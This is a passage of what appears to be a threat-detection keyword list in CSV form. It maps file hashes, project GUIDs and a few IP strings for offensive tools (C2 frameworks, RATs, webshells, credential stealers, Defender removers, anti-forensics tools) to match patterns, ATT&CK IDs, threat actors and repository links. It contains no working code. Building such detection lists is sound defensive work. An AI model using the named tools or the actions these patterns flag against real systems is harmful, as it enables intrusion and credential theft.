"*18913650346b45f2c32f414f1f82c5a6ca6fefaf7294e292c71cccf18332632b*",".{0,1000}18913650346b45f2c32f414f1f82c5a6ca6fefaf7294e292c71cccf18332632b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - 
TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22466" "*189219A1-9A2A-4B09-8F69-6207E9996F94*",".{0,1000}189219A1\-9A2A\-4B09\-8F69\-6207E9996F94.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22467" "*18950aed7a4061673d241d5548f425779a3fa89e734a28b2b91fed786894a698*",".{0,1000}18950aed7a4061673d241d5548f425779a3fa89e734a28b2b91fed786894a698.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22468" "*189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482*",".{0,1000}189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","22471" "*18a3d4ed574aa0dc9739be285b98eca7fc79eba3776821a13539f06447a22704*",".{0,1000}18a3d4ed574aa0dc9739be285b98eca7fc79eba3776821a13539f06447a22704.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - 
T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22473" "*18A66118-B98D-4FFC-AABE-DAFF5779F14C*",".{0,1000}18A66118\-B98D\-4FFC\-AABE\-DAFF5779F14C.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#GUIDproject","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","22474" "*18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b*",".{0,1000}18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22478" "*18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed*",".{0,1000}18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","22479" 
"*18c54c69f41d0b7e5928c34e1e9350ed99ecd0278ea37df11a429018ca3d05ed*",".{0,1000}18c54c69f41d0b7e5928c34e1e9350ed99ecd0278ea37df11a429018ca3d05ed.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","22480" "*18c5b272fb057271e5017d232deb701e195e05f7a7c0a98b176325dfc2774a30*",".{0,1000}18c5b272fb057271e5017d232deb701e195e05f7a7c0a98b176325dfc2774a30.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22481" "*18C681A2-072F-49D5-9DE6-74C979EAE08B*",".{0,1000}18C681A2\-072F\-49D5\-9DE6\-74C979EAE08B.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","#GUIDproject","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","22482" "*18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7*",".{0,1000}18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","22484" 
"*18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24*",".{0,1000}18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22485" "*18da2934d552b548d067b86dc22cad36399bb3e24395de0f9c13b4f6a8f09b74*",".{0,1000}18da2934d552b548d067b86dc22cad36399bb3e24395de0f9c13b4f6a8f09b74.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22488" "*18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed*",".{0,1000}18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22490" "*18e5187ae45ee5e13379dae0657430a843fae52848b19f572d2fde65906cad4d*",".{0,1000}18e5187ae45ee5e13379dae0657430a843fae52848b19f572d2fde65906cad4d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - 
T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22491" "*18e9b39ab7c27ea80c6b76fc04881a5348de491ab22abe65a6bdb7254e23d5d1*",".{0,1000}18e9b39ab7c27ea80c6b76fc04881a5348de491ab22abe65a6bdb7254e23d5d1.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22492" "*18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782*",".{0,1000}18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","22494" 
"*18f07ed52889ed4acd8967813d25ff8c5494b1fdfd1c0727eb7cad73d5fd7a2f*",".{0,1000}18f07ed52889ed4acd8967813d25ff8c5494b1fdfd1c0727eb7cad73d5fd7a2f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22495" "*18fce84919acb963f9ed765c122a5ff844a62036b4bdfaf6c95a30907d14460f*",".{0,1000}18fce84919acb963f9ed765c122a5ff844a62036b4bdfaf6c95a30907d14460f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22496" "*19013572f33e98d38e2236f86b6659b0324409b670680b6fbb9036f7630372c4*",".{0,1000}19013572f33e98d38e2236f86b6659b0324409b670680b6fbb9036f7630372c4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22497" "*1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181*",".{0,1000}1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 
- TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22498" "*190DFAEB-0288-4043-BE0E-3273FA653B52*",".{0,1000}190DFAEB\-0288\-4043\-BE0E\-3273FA653B52.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#GUIDproject","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","22499" "*1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf*",".{0,1000}1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22501" "*191726b972ff700b962e92c032e0f155ab314c2edec1517e18f69c63073eb859*",".{0,1000}191726b972ff700b962e92c032e0f155ab314c2edec1517e18f69c63073eb859.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22502" 
"*1917921CEF704F71B692C3EC0D238FE98AF8EF1EE20CACAAD67FBC3BB885EE9A*",".{0,1000}1917921CEF704F71B692C3EC0D238FE98AF8EF1EE20CACAAD67FBC3BB885EE9A.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22504" "*19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88*",".{0,1000}19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22505" "*191fdeb92ab3cf8ae11e804d907366ff7ee95d92f10b88f352aeeb3ea1d8ff52*",".{0,1000}191fdeb92ab3cf8ae11e804d907366ff7ee95d92f10b88f352aeeb3ea1d8ff52.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - 
TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22506" "*192.168.0.110:1234*",".{0,1000}192\.168\.0\.110\:1234.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","22507" "*192.168.1.229 Passw0rd!*",".{0,1000}192\.168\.1\.229\sPassw0rd!.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","22508" "*1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731*",".{0,1000}1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22509" "*192f251afb217d7b5080564ef78df67235cf0e47bd78a458706a5dd958a9d093*",".{0,1000}192f251afb217d7b5080564ef78df67235cf0e47bd78a458706a5dd958a9d093.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22510" 
"*19344cc373b3ed325dd8fcbd5ea333922495486b206c6098c7314f055e194646*",".{0,1000}19344cc373b3ed325dd8fcbd5ea333922495486b206c6098c7314f055e194646.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22513" "*193aee65af4af71fe6194ac4c2214a27d78706558c25022f018ed3e28bfe7670*",".{0,1000}193aee65af4af71fe6194ac4c2214a27d78706558c25022f018ed3e28bfe7670.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22514" "*193b8c35b6f71c1a9c53befb0d950d7734743da958cd6d1a47975b3c4af6cdd2*",".{0,1000}193b8c35b6f71c1a9c53befb0d950d7734743da958cd6d1a47975b3c4af6cdd2.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22515" "*193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa*",".{0,1000}193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22516" "*1952b4c118cb7ca4aa49a835036782a0f240d9ae6214661ac76b4320eb20abd8*",".{0,1000}1952b4c118cb7ca4aa49a835036782a0f240d9ae6214661ac76b4320eb20abd8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22520" 
"*1958310b6f2ab97181768cdebab34fd9eff9218280b9a6a753800009ded8f9b7*",".{0,1000}1958310b6f2ab97181768cdebab34fd9eff9218280b9a6a753800009ded8f9b7.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","22521" "*195c384a1caf0e50ea74c69de39b90e27dcc9635d951f8a652cc322696614e59*",".{0,1000}195c384a1caf0e50ea74c69de39b90e27dcc9635d951f8a652cc322696614e59.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22522" "*195cbf85cbf9fc7dcd011b2658819cf3350195f61021cb7c5a6f6e32cba15f03*",".{0,1000}195cbf85cbf9fc7dcd011b2658819cf3350195f61021cb7c5a6f6e32cba15f03.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","22523" "*196581c3cefce544c150faf2fb0ed7d82940adac5f2a5b51e034453644f725c6*",".{0,1000}196581c3cefce544c150faf2fb0ed7d82940adac5f2a5b51e034453644f725c6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22524" 
"*1965d3bd9a3a06fe2f9706410cb44194e4b23ddb51ed23fcc3bf4ed91681c9d4*",".{0,1000}1965d3bd9a3a06fe2f9706410cb44194e4b23ddb51ed23fcc3bf4ed91681c9d4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","22525" "*196B8469-F798-4ECC-9A77-C1CAB5BF6EAE*",".{0,1000}196B8469\-F798\-4ECC\-9A77\-C1CAB5BF6EAE.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","22526" "*196c82b02658590978ac1649a859f15db1ebd9012027d9a80674241ecc003400*",".{0,1000}196c82b02658590978ac1649a859f15db1ebd9012027d9a80674241ecc003400.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","22527" "*196fdd20e7b602c3b86450e6d4da311618509d31fd3be0af50dee8bd76a5130c*",".{0,1000}196fdd20e7b602c3b86450e6d4da311618509d31fd3be0af50dee8bd76a5130c.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - 
TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","22529" "*19729c5e11a7925f7b9ede557e6acf71da961f0a609e72b1f2f836e5f40533e3*",".{0,1000}19729c5e11a7925f7b9ede557e6acf71da961f0a609e72b1f2f836e5f40533e3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22530" "*19735351ac352430f7b951a11b6a9a9d64a1e911f5471b861276c39b84e1302f*",".{0,1000}19735351ac352430f7b951a11b6a9a9d64a1e911f5471b861276c39b84e1302f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22531" "*197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4*",".{0,1000}197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22533" "*197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa*",".{0,1000}197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - 
